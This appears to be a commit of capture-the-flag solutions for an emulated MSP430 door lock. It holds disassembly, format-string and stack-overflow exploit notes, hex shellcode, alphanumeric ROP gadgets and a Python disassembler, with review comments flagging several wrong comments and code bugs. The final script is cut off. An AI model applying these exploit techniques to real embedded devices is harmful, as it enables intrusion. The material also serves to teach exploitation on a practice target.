||||||
|
push r13
|
||||||
|
push r7
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
jmp $+0xa2 <printf+0x162>
|
||||||
|
cmp.b #0x73, r14
|
||||||
|
jnz $+0x32 <printf+0xf8>
|
||||||
|
mov @r11, r14
|
||||||
|
clr r8
|
||||||
|
jmp $+0x24 <printf+0xf0>
|
||||||
|
inc r12
|
||||||
|
inc r14
|
||||||
|
sxt r9
|
||||||
|
push r8
|
||||||
|
push r9
|
||||||
|
push r8
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r8, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
mov.b @r14, r9
|
||||||
|
tst.b r9
|
||||||
|
jnz $-0x26 <printf+0xce>
|
||||||
|
jmp $+0x6c <printf+0x162>
|
||||||
|
cmp.b #0x78, r14
|
||||||
|
jnz $+0x5a <printf+0x156>
|
||||||
|
mov @r11, r14
|
||||||
|
mov #0x4, r9
|
||||||
|
jmp $+0x4a <printf+0x14c>
|
||||||
|
mov r14, r15
|
||||||
|
swpb r15
|
||||||
|
and #0xff, r15
|
||||||
|
clrc
|
||||||
|
rrc r15
|
||||||
|
rra r15
|
||||||
|
rra r15
|
||||||
|
rra r15
|
||||||
|
cmp r15, r6
|
||||||
|
jl $+0xa <printf+0x122>
|
||||||
|
mov r15, r8
|
||||||
|
add #0x30, r8
|
||||||
|
jmp $+0x8 <printf+0x128>
|
||||||
|
mov r15, r8
|
||||||
|
add #0x57, r8
|
||||||
|
push r13
|
||||||
|
push r8
|
||||||
|
push r13
|
||||||
|
push pc
|
||||||
|
push sr
|
||||||
|
mov r13, r15
|
||||||
|
swpb r15
|
||||||
|
mov r15, sr
|
||||||
|
bis #0x8000, sr
|
||||||
|
call #0x10
|
||||||
|
pop sr
|
||||||
|
add #0x8, sp
|
||||||
|
add r14, r14
|
||||||
|
add r14, r14
|
||||||
|
add r14, r14
|
||||||
|
add r14, r14
|
||||||
|
add #-0x1, r9
|
||||||
|
cmp #-0x1, r9
|
||||||
|
jnz $-0x4c <printf+0x104>
|
||||||
|
add #0x4, r12
|
||||||
|
jmp $+0xe <printf+0x162>
|
||||||
|
cmp.b #0x6e, r14
|
||||||
|
jnz $+0x8 <printf+0x162>
|
||||||
|
mov @r11, r15
|
||||||
|
mov r12, 0x0(r15)
|
||||||
|
incd r11
|
||||||
|
inc r10
|
||||||
|
mov.b @r10, r15
|
||||||
|
tst.b r15
|
||||||
|
jnz $-0xfa <printf+0x70>
|
||||||
|
mov -0x10(r4), sp
|
||||||
|
incd sp
|
||||||
|
pop r4
|
||||||
|
pop r6
|
||||||
|
pop r7
|
||||||
|
pop r8
|
||||||
|
pop r9
|
||||||
|
pop r10
|
||||||
|
pop r11
|
||||||
|
ret
|
||||||
|
|
||||||
|
;;;
|
||||||
|
def bypass (printf_loc):
|
||||||
|
aslr_base = printf_loc - 0x36a;
|
||||||
|
print(b'%n%x'.hex())
|
||||||
|
print(f"{b'AAAA1011'.hex()}{aslr_base+0x56c:x}7f7f{aslr_base+0x4f4:x}")
|
||||||
|
;;;
|
||||||
|
|
||||||
|
aslr_base_0x4ec: <_INT>
|
||||||
|
_INT:
|
||||||
|
48ec: 1e41 0200 mov 0x2(sp), r14
|
||||||
|
48f0: 0212 push sr
|
||||||
|
48f2: 0f4e mov r14, r15
|
||||||
|
aslr_base_0x4f4:
|
||||||
|
48f4: 8f10 swpb r15
|
||||||
|
48f6: 024f mov r15, sr
|
||||||
|
48f8: 32d0 0080 bis #0x8000, sr
|
||||||
|
48fc: b012 1000 call #0x10
|
||||||
|
4900: 3241 pop sr
|
||||||
|
4902: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x504: <INT>
|
||||||
|
INT:
|
||||||
|
4904: 0c4f mov r15, r12
|
||||||
|
4906: 0d12 push r13
|
||||||
|
4908: 0e12 push r14
|
||||||
|
490a: 0c12 push r12
|
||||||
|
490c: 0012 push pc
|
||||||
|
490e: 0212 push sr
|
||||||
|
4910: 0f4c mov r12, r15
|
||||||
|
4912: 8f10 swpb r15
|
||||||
|
4914: 024f mov r15, sr
|
||||||
|
4916: 32d0 0080 bis #0x8000, sr
|
||||||
|
491a: b012 1000 call #0x10
|
||||||
|
491e: 3241 pop sr
|
||||||
|
4920: 3152 add #0x8, sp
|
||||||
|
4922: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x524: <putchar>
|
||||||
|
putchar:
|
||||||
|
4924: 0e4f mov r15, r14
|
||||||
|
4926: 0d43 clr r13
|
||||||
|
4928: 0d12 push r13
|
||||||
|
492a: 0e12 push r14
|
||||||
|
492c: 0d12 push r13
|
||||||
|
492e: 0012 push pc
|
||||||
|
4930: 0212 push sr
|
||||||
|
4932: 0f4d mov r13, r15
|
||||||
|
4934: 8f10 swpb r15
|
||||||
|
4936: 024f mov r15, sr
|
||||||
|
4938: 32d0 0080 bis #0x8000, sr
|
||||||
|
493c: b012 1000 call #0x10
|
||||||
|
4940: 3241 pop sr
|
||||||
|
4942: 3152 add #0x8, sp
|
||||||
|
4944: 0f4e mov r14, r15
|
||||||
|
4946: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x548: <getchar>
|
||||||
|
getchar:
|
||||||
|
4948: 2183 decd sp
|
||||||
|
494a: 0d43 clr r13
|
||||||
|
494c: 1e43 mov #0x1, r14
|
||||||
|
494e: 0c41 mov sp, r12
|
||||||
|
4950: 0d12 push r13
|
||||||
|
4952: 0c12 push r12
|
||||||
|
4954: 0e12 push r14
|
||||||
|
4956: 0012 push pc
|
||||||
|
4958: 0212 push sr
|
||||||
|
495a: 0f4e mov r14, r15
|
||||||
|
495c: 8f10 swpb r15
|
||||||
|
495e: 024f mov r15, sr
|
||||||
|
4960: 32d0 0080 bis #0x8000, sr
|
||||||
|
4964: b012 1000 call #0x10
|
||||||
|
4968: 3241 pop sr
|
||||||
|
496a: 3152 add #0x8, sp
|
||||||
|
496c: 6f41 mov.b @sp, r15
|
||||||
|
496e: 8f11 sxt r15
|
||||||
|
4970: 2153 incd sp
|
||||||
|
4972: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x574: <getsn>
|
||||||
|
getsn:
|
||||||
|
4974: 0d4f mov r15, r13
|
||||||
|
4976: 2c43 mov #0x2, r12
|
||||||
|
4978: 0e12 push r14
|
||||||
|
497a: 0d12 push r13
|
||||||
|
497c: 0c12 push r12
|
||||||
|
497e: 0012 push pc
|
||||||
|
4980: 0212 push sr
|
||||||
|
4982: 0f4c mov r12, r15
|
||||||
|
4984: 8f10 swpb r15
|
||||||
|
4986: 024f mov r15, sr
|
||||||
|
4988: 32d0 0080 bis #0x8000, sr
|
||||||
|
498c: b012 1000 call #0x10
|
||||||
|
4990: 3241 pop sr
|
||||||
|
4992: 3152 add #0x8, sp
|
||||||
|
4994: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x596: <puts>
|
||||||
|
puts:
|
||||||
|
4996: 0e4f mov r15, r14
|
||||||
|
4998: 0c43 clr r12
|
||||||
|
499a: 103c jmp $+0x22 <puts+0x26>
|
||||||
|
499c: 1e53 inc r14
|
||||||
|
499e: 8d11 sxt r13
|
||||||
|
49a0: 0c12 push r12
|
||||||
|
49a2: 0d12 push r13
|
||||||
|
49a4: 0c12 push r12
|
||||||
|
49a6: 0012 push pc
|
||||||
|
49a8: 0212 push sr
|
||||||
|
49aa: 0f4c mov r12, r15
|
||||||
|
49ac: 8f10 swpb r15
|
||||||
|
49ae: 024f mov r15, sr
|
||||||
|
49b0: 32d0 0080 bis #0x8000, sr
|
||||||
|
49b4: b012 1000 call #0x10
|
||||||
|
49b8: 3241 pop sr
|
||||||
|
49ba: 3152 add #0x8, sp
|
||||||
|
49bc: 6d4e mov.b @r14, r13
|
||||||
|
49be: 4d93 tst.b r13
|
||||||
|
49c0: ed23 jnz $-0x24 <puts+0x6>
|
||||||
|
49c2: 0e43 clr r14
|
||||||
|
49c4: 3d40 0a00 mov #0xa, r13
|
||||||
|
49c8: 0e12 push r14
|
||||||
|
49ca: 0d12 push r13
|
||||||
|
49cc: 0e12 push r14
|
||||||
|
49ce: 0012 push pc
|
||||||
|
49d0: 0212 push sr
|
||||||
|
49d2: 0f4e mov r14, r15
|
||||||
|
49d4: 8f10 swpb r15
|
||||||
|
49d6: 024f mov r15, sr
|
||||||
|
49d8: 32d0 0080 bis #0x8000, sr
|
||||||
|
49dc: b012 1000 call #0x10
|
||||||
|
49e0: 3241 pop sr
|
||||||
|
49e2: 3152 add #0x8, sp
|
||||||
|
49e4: 0f4e mov r14, r15
|
||||||
|
49e6: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x5e8: <_memcpy>
|
||||||
|
memcpy:
|
||||||
|
49e8: 1c41 0600 mov 0x6(sp), r12
|
||||||
|
49ec: 0f43 clr r15
|
||||||
|
49ee: 093c jmp $+0x14 <_memcpy+0x1a>
|
||||||
|
49f0: 1e41 0200 mov 0x2(sp), r14
|
||||||
|
49f4: 0e5f add r15, r14
|
||||||
|
49f6: 1d41 0400 mov 0x4(sp), r13
|
||||||
|
49fa: 0d5f add r15, r13
|
||||||
|
49fc: ee4d 0000 mov.b @r13, 0x0(r14)
|
||||||
|
4a00: 1f53 inc r15
|
||||||
|
4a02: 0f9c cmp r12, r15
|
||||||
|
4a04: f523 jnz $-0x14 <_memcpy+0x8>
|
||||||
|
4a06: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_608: <_bzero>
|
||||||
|
bzero:
|
||||||
|
4a08: 0d43 clr r13
|
||||||
|
4a0a: 053c jmp $+0xc <_bzero+0xe>
|
||||||
|
4a0c: 0c4f mov r15, r12
|
||||||
|
4a0e: 0c5d add r13, r12
|
||||||
|
4a10: cc43 0000 mov.b #0x0, 0x0(r12)
|
||||||
|
4a14: 1d53 inc r13
|
||||||
|
4a16: 0d9e cmp r14, r13
|
||||||
|
4a18: f923 jnz $-0xc <_bzero+0x4>
|
||||||
|
4a1a: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x61c: <rand>
|
||||||
|
rand:
|
||||||
|
4a1c: 0e43 clr r14
|
||||||
|
4a1e: 3d40 2000 mov #0x20, r13
|
||||||
|
4a22: 0e12 push r14
|
||||||
|
4a24: 0e12 push r14
|
||||||
|
4a26: 0d12 push r13
|
||||||
|
4a28: 0012 push pc
|
||||||
|
4a2a: 0212 push sr
|
||||||
|
4a2c: 0f4d mov r13, r15
|
||||||
|
4a2e: 8f10 swpb r15
|
||||||
|
4a30: 024f mov r15, sr
|
||||||
|
4a32: 32d0 0080 bis #0x8000, sr
|
||||||
|
4a36: b012 1000 call #0x10
|
||||||
|
4a3a: 3241 pop sr
|
||||||
|
4a3c: 3152 add #0x8, sp
|
||||||
|
4a3e: 0f4f mov r15, r15
|
||||||
|
4a40: 3041 ret
|
||||||
|
|
||||||
|
aslr_base_0x642: <conditional_unlock_door>
|
||||||
|
conditional_unlock_door:
|
||||||
|
4a42: 2183 decd sp
|
||||||
|
4a44: 0e4f mov r15, r14
|
||||||
|
4a46: 3d40 7e00 mov #0x7e, r13
|
||||||
|
4a4a: 0c41 mov sp, r12
|
||||||
|
4a4c: 0c12 push r12
|
||||||
|
4a4e: 0e12 push r14
|
||||||
|
4a50: 0d12 push r13
|
||||||
|
4a52: 0012 push pc
|
||||||
|
4a54: 0212 push sr
|
||||||
|
4a56: 0f4d mov r13, r15
|
||||||
|
4a58: 8f10 swpb r15
|
||||||
|
4a5a: 024f mov r15, sr
|
||||||
|
4a5c: 32d0 0080 bis #0x8000, sr
|
||||||
|
4a60: b012 1000 call #0x10
|
||||||
|
4a64: 3241 pop sr
|
||||||
|
4a66: 3152 add #0x8, sp
|
||||||
|
4a68: 0f43 clr r15
|
||||||
|
4a6a: 2153 incd sp
|
||||||
|
4a6c: 3041 ret
|
||||||
|
4a6e <_unexpected_>
|
||||||
|
4a6e: 0013 reti pc
|
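--- a/15 - Bangalore/Bangalore notes.asm
+++ b/15 - Bangalore/Bangalore notes.asm
@@ -0,0 +1,38 @@
+.msp430
+.bss
+
+at return, r14 is #000a
+
+
+; padding
+[41414141414141414141414141414141]
+
+; fake stack pages:
+page1:
+ba4440000000 ; set page executable;; payload
+page2:
+400a:
+0640
+
+; payload
+31800600324000ffb0121000
+
+; assembled payload:
+41414141414141414141414141414141ba4440000000064031800600324000ffb0121000
+
+32420800b0121000:
+mov #8f00, sr
+call #0x10
+
+.text
+3f403f80591b024fb0121000:
+mov #ff01, r15
+sub #7001, r15
+mov r15, sr
+call #0x10
+
+
+32403280591bb0121000:
+mov #ff01, sr
+sub #7001,sr
+call #0x10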
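--- a/16 - Lagos/Lagos Solution.asm
+++ b/16 - Lagos/Lagos Solution.asm
@@ -0,0 +1,15 @@
+.msp430
+
+
+.text 0x25c0
+exploit:
+mov #0xff00, sr
+call #0010
+
+.text 0x4444
+setup:
+; sub 0x1e40, sp
+add #0x674a, sp
+add #0x7a7a, sp
+; br &sp
+ret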
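Review bot: The comment `; sub 0x1e40, sp` above the two `add` lines does not match their arithmetic: 0x674a + 0x7a7a = 0xe1c4, which as a 16-bit wrap is a net `sub #0x1e3c, sp`, and the docstring in paygen.py describes the same pair as `sub #0x1e6e`. Recording the value once, e.g. `; add #0x674a + add #0x7a7a == sub #0x1e3c, sp (mod 0x10000)`, avoids a reader trusting whichever number they see first. The immediate notation is also mixed in this file — `#0xff00` carries a prefix while `#0010` does not, whereas the other listings in this commit write `#0x10` — so one form should be used consistently to make clear which operand is meant.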
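--- a/16 - Lagos/Lagos notes.asm
+++ b/16 - Lagos/Lagos notes.asm
@@ -0,0 +1,66 @@
+; Goal: execute code from 0x25b6
+
+; stack buffer: 43ed
+; mem buffer: 2400
+
+passwordpassword1[retval][pcoffset]0[realfunc][padding]0[bootstrapper]
+
+retval = 0x4430 ; &bootstrapper
+pcoffset = 0x2443-0x4430 ; &realfunc - retval
+padding = "A"*0x30 + "1" ; alignment
+bootstrapper = subc @sp+, pc ; 3071
+
+
+'passwordpassword1' + 'D0' + '??' + '0' + [realfunc][padding]0[bootstrapper]
+
+bootstrapper:
+add @sp+, r15
+
+realfunc:
+push #0x7f
+call 45fc
+
+3012 7e00 b012 fc45
+
+; Step 1: Create a bootstrapper out of alphanumeric characters, and store it on the stack
+; this instruction pops a value off the stack and subtracts it from pc. Perfect for
+subc @sp+, pc
+
+b'passwordpassword1'+(b'\x30\x71'*0x1a4)+b'00000000000000'
+
+code snippets:
+; pop to register
+3n413041 ; nA0A
+pop Rn
+ret
+
+; popadd to register
+add @sp+, rN ; nq0A
+ret
+
+32413041 ; 2A0A
+pop sr
+ret
+
+
+ROP gadgets:
+
+Pop sr
+
+
+Move byte relative to R4 into r15
+4464 ("Dd"):
+mov.b -0x4(r4), r15
+sxt r15
+add #0x8, sp
+pop r4
+ret
+
+Pop r4:
+446c ("Dl")
+pop r4
+ret
+
+
+
+passwordpassword1DlDd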
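--- a/16 - Lagos/Lagos.asm
+++ b/16 - Lagos/Lagos.asm
@@ -0,0 +1,64 @@
+
+login:
+; calling convention
+455e: 0b12 push r11
+; print message
+4560: 3150 f0ff add #0xfff0, sp
+4564: 3f40 7044 mov #0x4470 "Enter the password to continue.", r15
+4568: b012 6046 call #0x4660 <puts>
+456c: 3f40 9044 mov #0x4490 "Remember: passwords are between 8 and 16 characters.", r15
+4570: b012 6046 call #0x4660 <puts>
+4574: 3f40 c544 mov #0x44c5 "Due to some users abusing our login system, we have", r15
+4578: b012 6046 call #0x4660 <puts>
+457c: 3f40 f944 mov #0x44f9 "restricted passwords to only alphanumeric characters.", r15
+4580: b012 6046 call #0x4660 <puts>
+; Move 0x200 B from stdin to 0x2400
+4584: 3e40 0002 mov #0x200, r14
+4588: 3f40 0024 mov #0x2400, r15
+458c: b012 5046 call #0x4650 <getsn>
+; set up registers
+4590: 5f42 0024 mov.b &0x2400, r15
+4594: 0e43 clr r14
+4596: 7c40 0900 mov.b #0x9, r12
+459a: 7d40 1900 mov.b #0x19, r13
+; jump into loop
+459e: 073c jmp $+0x10 <login+0x50>
+; Get a character
+45a0: 0b41 mov sp, r11
+45a2: 0b5e add r14, r11
+45a4: cb4f 0000 mov.b r15, 0x0(r11)
+; move the character to
+45a8: 5f4e 0024 mov.b 0x2400(r14), r15
+45ac: 1e53 inc r14
+login_0x50:
+45ae: 4b4f mov.b r15, r11
+45b0: 7b50 d0ff add.b #0xffd0, r11
+45b4: 4c9b cmp.b r11, r12
+45b6: f42f jc $-0x16 <login+0x42>
+45b8: 7b50 efff add.b #0xffef, r11
+45bc: 4d9b cmp.b r11, r13
+45be: f02f jc $-0x1e <login+0x42>
+45c0: 7b50 e0ff add.b #0xffe0, r11
+45c4: 4d9b cmp.b r11, r13
+45c6: ec2f jc $-0x26 <login+0x42>
+
+; Delete the byte at the unalignment position
+45c8: c143 0000 mov.b #0x0, 0x0(sp)
+
+; Reset the temporary buffer to all 0
+45cc: 3d40 0002 mov #0x200, r13
+45d0: 0e43 clr r14
+45d2: 3f40 0024 mov #0x2400, r15
+45d6: b012 8c46 call #0x468c <memset>
+45da: 0f41 mov sp, r15
+45dc: b012 4644 call #0x4446 <conditional_unlock_door>
+45e0: 0f93 tst r15
+45e2: 0324 jz $+0x8 <login+0x8c>
+45e4: 3f40 2f45 mov #0x452f "Access granted.", r15
+45e8: 023c jmp $+0x6 <login+0x90>
+45ea: 3f40 3f45 mov #0x453f "That password is not correct.", r15
+45ee: b012 6046 call #0x4660 <puts>
+45f2: 3150 1000 add #0x10, sp
+; calling convention
+45f6: 3b41 pop r11
+45f8: 3041 ret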
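Review bot: The comment `; move the character to` before `45a8` is cut off mid-sentence; from the two instructions it annotates it should read `; load the next byte from the 0x2400 buffer into r15 and advance the index`. The annotations would also benefit from stating the copy loop's bound explicitly: `4560` reserves a 0x10-byte frame, `458c` reads up to 0x200 bytes into 0x2400, and the store at `45a4` writes each byte to `sp + r14` for as long as the character-class checks at `45b4`–`45c4` keep taking the `jc` back to `login+0x42`, so nothing in the loop compares r14 against the frame size. A comment such as `; loop is bounded only by the alphanumeric check, not by the 0x10-byte frame` states what the listing demonstrates and explains why the 0x2400 staging buffer matters.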
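--- a/16 - Lagos/disassemble.py
+++ b/16 - Lagos/disassemble.py
@@ -0,0 +1,249 @@
+
+
+# Copied from MSProbe/msprobe.py
+
+PC = 0 #Incremented by each disassembled instruction, incremented in words NOT bytes
+asm = [0x7f7f, 0x4242, 0x4343] # fuck you *hardcodes your instructions
+output = {}
+
+register_names = ['pc', 'sp', 'sr', 'cg', 'r4', 'r5', 'r6', 'r7', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15']
+
+def dis_int(i: int, e: str = 'big'):
+    dis_bytes(i.to_bytes(6,'big'), e)
+
+def dis_bytes(b: bytes, e: str = 'big'):
+    global PC, asm
+    asm[0] = int.from_bytes(b[0:2], e)
+    asm[1] = int.from_bytes(b[2:4], e)
+    asm[2] = int.from_bytes(b[4:6], e)
+    PC = 0
+    return disassemble(asm[PC])
+
+
+
+def bitrep(number, bits = 16):
+    """Converts to binary form, fixing leading zeroes."""
+    mask = int('0b' + '1' * bits, 2)
+    binstr = str(bin(number & mask))[2:]
+    #negative = binstr[0] == '-'
+    bitcount = len(binstr)
+    leading0s = bits - bitcount
+    return ('0' * leading0s) + binstr
+
+def hexrep(number, zeroes = 4):
+    """Converts to hex form, fixing leading zeroes."""
+    mask = int('0b' + '1' * (zeroes * 4), 2)
+    hexstr = hex(number & mask)[2:]
+    hexcount = len(hexstr)
+    leading0s = zeroes - hexcount
+    return ('0' * leading0s) + hexstr
+
+def disassemble(instruction):
+    """Main disassembly, calls other disassembly functions given a 2-byte instruction."""
+    #Let's start by getting the binary representation.
+    #Need to invert bytes because little endian.
+    ins = bitrep(instruction)
+    #What kind of instruction are we dealing with?
+    if ins[0:3] == '001':
+        return disassemble_jump_instruction(ins)
+    elif ins[0:6] == '000100':
+        return disassemble_one_word_instruction(ins)
+    else:
+        return disassemble_two_word_instruction(ins)
+
+one_word_opcodes = ['rrc', 'swpb', 'rra', 'sxt', 'push', 'call', 'reti']
+def disassemble_one_word_instruction(ins):
+    """Given a one-operand (format I) instruction in a 16-bit string, output disassembly."""
+    global PC #Get PC
+
+    bytemode = '.b' if ins[9] == '1' else ''
+    opcodeID = int(ins[6:9], 2)
+    opcode = one_word_opcodes[opcodeID]
+    reg = int(ins[12:], 2)
+
+    adrmode = int(ins[10:12], 2)
+    reg_output, extensionWord = disassemble_addressing_mode(reg, adrmode)
+
+    PC += 1 + (1 if extensionWord else 0)
+
+    return opcode + bytemode + ' ' + reg_output
+
+jump_opcodes = ['jne', 'jeq', 'jlo', 'jhs', 'jn ', 'jge', 'jl ', 'jmp']
+def disassemble_jump_instruction(ins):
+    """Given a jump instruction (format II) in a 16-bit string, output disassembly."""
+    global PC #Get PC
+
+    condition = int(ins[3:6], 2) #Get condition code from bits
+    #Sign extend
+    offset = ins[6] * 6 + ins[6:]
+    sign_subtract = 65536 if offset[0] == '1' else 0 #Sign bit
+    pcOffset = ((int(offset, 2) - sign_subtract) * 2) + 2
+
+    #Add a plus if it's not negative for readability
+    plus = '+' if sign_subtract == 0 else ''
+
+    PC += 1
+
+    return jump_opcodes[condition] + ' ' + plus + hex(pcOffset)
+
+#Two-operand opcodes start at 4 (0b0100)
+two_word_opcodes = ['!!!', '!!!', '!!!', '!!!', 'mov', 'add', 'addc', 'subc', 'sub', 'cmp', 'dadd', 'bit', 'bic', 'bis', 'xor', 'and']
+def disassemble_two_word_instruction(ins):
+    """Given a two-operand instruction (format III) in a 16-bit string, output disassembly."""
+    global PC #Get PC
+
+    bytemode = '.b' if ins[9] == '1' else ''
+    opcodeID = int(ins[0:4], 2)
+    opcode = two_word_opcodes[opcodeID]
+
+    srcReg = int(ins[4:8], 2)
+    srcAdrMode = int(ins[10:12], 2)
+
+    reg_output_src, extWordSrc = disassemble_addressing_mode(srcReg, srcAdrMode)
+    PC += 1 if extWordSrc else 0
+
+    dstReg = int(ins[12:], 2)
+    dstAdrMode = int(ins[8], 2)
+
+    reg_output_dst, ext_word_dst = disassemble_addressing_mode(dstReg, dstAdrMode)
+    PC += 1 if ext_word_dst else 0
+
+    PC += 1 #Instruction word
+
+    finalins = opcode + bytemode + ' ' + reg_output_src + ', ' + reg_output_dst
+
+    #Disassemble pseudo (emulated) instructions
+
+    #These are the easy ones to catch
+    finalins = 'ret' if finalins == 'mov @sp+, pc' else finalins
+
+    #Status register twiddling
+    finalins = 'clrc' if finalins == 'bic #1, sr' else finalins
+    finalins = 'setc' if finalins == 'bis #1, sr' else finalins
+    finalins = 'clrz' if finalins == 'bic #2, sr' else finalins
+    finalins = 'setz' if finalins == 'bis #2, sr' else finalins
+    finalins = 'clrn' if finalins == 'bic #4, sr' else finalins
+    finalins = 'setn' if finalins == 'bis #4, sr' else finalins
+    finalins = 'dint' if finalins == 'bic #8, sr' else finalins
+    finalins = 'eint' if finalins == 'bic #8, sr' else finalins
+    #nop = mov dst, dst
+    finalins = 'nop' if opcode == 'mov' and reg_output_src == reg_output_dst else finalins
+
+    #These ones require a small amount of effort because it uses any register.
+    #All of these are one-operand instructions, so if we need to reassemble
+    #the instruction, it'll simply follow the one-operand format.
+
+    reassembleins = True
+    uses_dest = True
+
+    #Branch. Requires a little bit of extra sanity checking
+    #because it could get mistaken for ret
+    if opcode == 'mov' and reg_output_dst == 'pc' and finalins != 'ret': #br = mov src, pc
+        opcode = 'br'
+        uses_dest = False #We're actually using src here
+
+    #Pop. Could also get mistaken for ret.
+    elif opcode == 'mov' and reg_output_src == '@sp+' and finalins != 'ret': #pop = mov @sp+, dst
+        opcode = 'pop'
+
+    #Shift and rotate left
+
+    elif opcode == 'add' and srcReg == dstReg: #rla = add dst, dst
+        opcode = 'rla'
+    elif opcode == 'addc' and srcReg == dstReg: #rlc = addc dst, dst
+        opcode = 'rlc'
+
+    #Common one-operand instructions
+
+    elif opcode == 'xor' and reg_output_src == '#0xffff {-1}': #inv = xor 0xffff, dst
+        opcode = 'inv'
+    #Extra sanity checking to prevent being mistaken for nop
+    elif opcode == 'mov' and reg_output_src == '#0' and reg_output_dst != '#0': #clr = mov #0, dst
+        opcode = 'clr'
+    elif opcode == 'cmp' and reg_output_src == '#0': #tst = cmp #0, dst
+        opcode = 'tst'
+
+
+    #Increment and decrement (by one or two)
+
+    elif opcode == 'sub' and reg_output_src == '#1': #dec = sub #1, dst
+        opcode = 'dec'
+    elif opcode == 'sub' and reg_output_src == '#2': #decd = sub #2, dst
+        opcode = 'decd'
+    elif opcode == 'add' and reg_output_src == '#1': #inc = add #1, dst
+        opcode = 'inc'
+    elif opcode == 'add' and reg_output_src == '#2': #incd = add #1, dst
+        opcode = 'incd'
+
+    #Add and subtract only the carry bit:
+
+    elif opcode == 'addc' and reg_output_src == '#0': #adc = addc #0, dst
+        opcode = 'adc'
+    elif opcode == 'dadd' and reg_output_src == '#0': #dadc = dadd #0, dst
+        opcode = 'dadc'
+    elif opcode == 'subc' and reg_output_src == '#0': #sbc = subc #0, dst
+        opcode = 'sbc'
+
+    #The instruction is not an emulated instruction
+    else:
+        reassembleins = False
+
+    if reassembleins:
+        finalins = opcode + bytemode + ' ' + (reg_output_dst if uses_dest else reg_output_src)
+
+    return finalins
+
+
+adr_modes = ['{register}', '{index}({register})', '@{register}', '@{register}+']
+
+def disassemble_addressing_mode(reg, adrmode):
+    """Outputs disassembly of a register's addressing mode and whether an extension
+    word was used (to update PC accordingly in the calling function),
+    given the register number and addressing mode number."""
+
+    #http://mspgcc.sourceforge.net/manual/x147.html
+
+    extensionWord = False
+    #print(f"{PC = :x}, {asm = }", end="");
+
+    #r2 (status register) and r3 (CG) are encoded as constant registers
+    if reg == 2:
+        if adrmode == 0: #Normal access
+            reg_output = adr_modes[adrmode].format(register=register_names[reg])
+        elif adrmode == 1: #Absolute address using extension word
+            reg_output = '&' + hex(asm[PC + 1]) #Get next word
+            extensionWord = True
+        elif adrmode == 2:
+            reg_output = '#4'
+        elif adrmode == 3:
+            reg_output = '#8'
+
+    elif reg == 3:
+        if adrmode == 0:
+            reg_output = '#0'
+        elif adrmode == 1:
+            reg_output = '#1'
+        elif adrmode == 2:
+            reg_output = '#2'
+        elif adrmode == 3:
+            #Just a little reminder that all bits set == -1
+            reg_output = '#0xffff {-1}'
+
+    elif adrmode == 0:
+        reg_output = adr_modes[adrmode].format(register=register_names[reg])
+
+    elif adrmode == 1:
+        reg_output = adr_modes[adrmode].format(register=register_names[reg], index=hex(asm[PC + 1]))
+        extensionWord = True
+
+    elif adrmode == 2:
+        reg_output = adr_modes[adrmode].format(register=register_names[reg])
+
+    elif adrmode == 3 and reg == 0: #PC was incremented for a constant
+        reg_output = '#' + hex(asm[PC + 1])
+        extensionWord = True
+
+    elif adrmode == 3:
+        reg_output = adr_modes[adrmode].format(register=register_names[reg])
+
+    return (reg_output, extensionWord)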
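Review bot: The emulated-instruction line `finalins = 'eint' if finalins == 'bic #8, sr' else finalins` tests the same pattern as the `dint` line directly above it, so it can never match and `bis #8, sr` is never rendered as `eint`; it should read `finalins = 'eint' if finalins == 'bis #8, sr' else finalins`. `dis_int` discards the result of `dis_bytes` and so always returns None — it needs `return dis_bytes(i.to_bytes(6,'big'), e)` — and the comment `#incd = add #1, dst` should say `#2` to match the condition beside it. The three docstrings also number the formats the opposite way from the MSP430 manual, which calls double-operand instructions format I, single-operand format II and jumps format III; swapping the labels in `disassemble_one_word_instruction`, `disassemble_jump_instruction` and `disassemble_two_word_instruction` would keep the copy from MSProbe from misleading anyone cross-checking against the reference.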
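--- a/16 - Lagos/generate_lut.py
+++ b/16 - Lagos/generate_lut.py
@@ -0,0 +1,62 @@
+import string
+from string import printable
+from math import ceil, floor
+
+valid = 0
+valid_chars = (string.digits + string.ascii_uppercase + string.ascii_lowercase).encode()
+
+def u16(i:int):
+    return i & 0xffff
+
+def half_pair(i: int) -> list:
+    i = u16(i)
+    return [floor(i/2), ceil(i/2)]
+
+def neg_half_pair(i: int) -> list:
+    # 2's c negate i
+    i = 0x10000 - u16(i)
+    return half_pair(i)
+
+def not_in_set(set, start: int = 0x0, end: int = 0xff):
+    for char in range(start, end+1):
+        if char not in set:
+            print(F"{char:02x}[{chr(char)}]", end=" ")
+
+
+def isprintable(char: int):
+    return f'{chr(char)}' if char > 0x30 and chr(char) in printable else "."
+
+# for solution in sorted(solutions):
+# print(f"{solution:02x} '{isprintable(solution)}'= {solutions[solution]}")
+
+def bfs(start, end, characters = valid_chars): #function for BFS
+    solutions = {}
+    queue = []
+    # Populate solutions with trivial solutions, and queue with the same
+    for character in characters:
+        solutions[character] = f'{character:x}';
+        queue.append(character)
+    # loop until the queue is empty, and every reachable number has been found
+    while queue:
+        current = queue.pop(0)
+        for neighbor in characters:
+            for operator, operation in [['+', int.__add__], ['-', int.__sub__]]:
+                new = operation(current, neighbor)
+                if new in solutions: continue
+                if new in range(start, end+1):
+                    solutions[new] = f"{solutions[current]} {operator} {neighbor:x}"
+                    queue.append(new)
+    return solutions
+
+super_valid_chars:bytes = []
+for one in valid_chars:
+    for two in valid_chars:
+        super_valid_chars.append (int.from_bytes(one.to_bytes(1, 'big') + two.to_bytes(1, 'big'), 'big'))
+
+
+solutions = bfs(0, 0xffff, super_valid_chars)
+for solution in sorted(solutions):
+    bas = solution.to_bytes(2, 'big')
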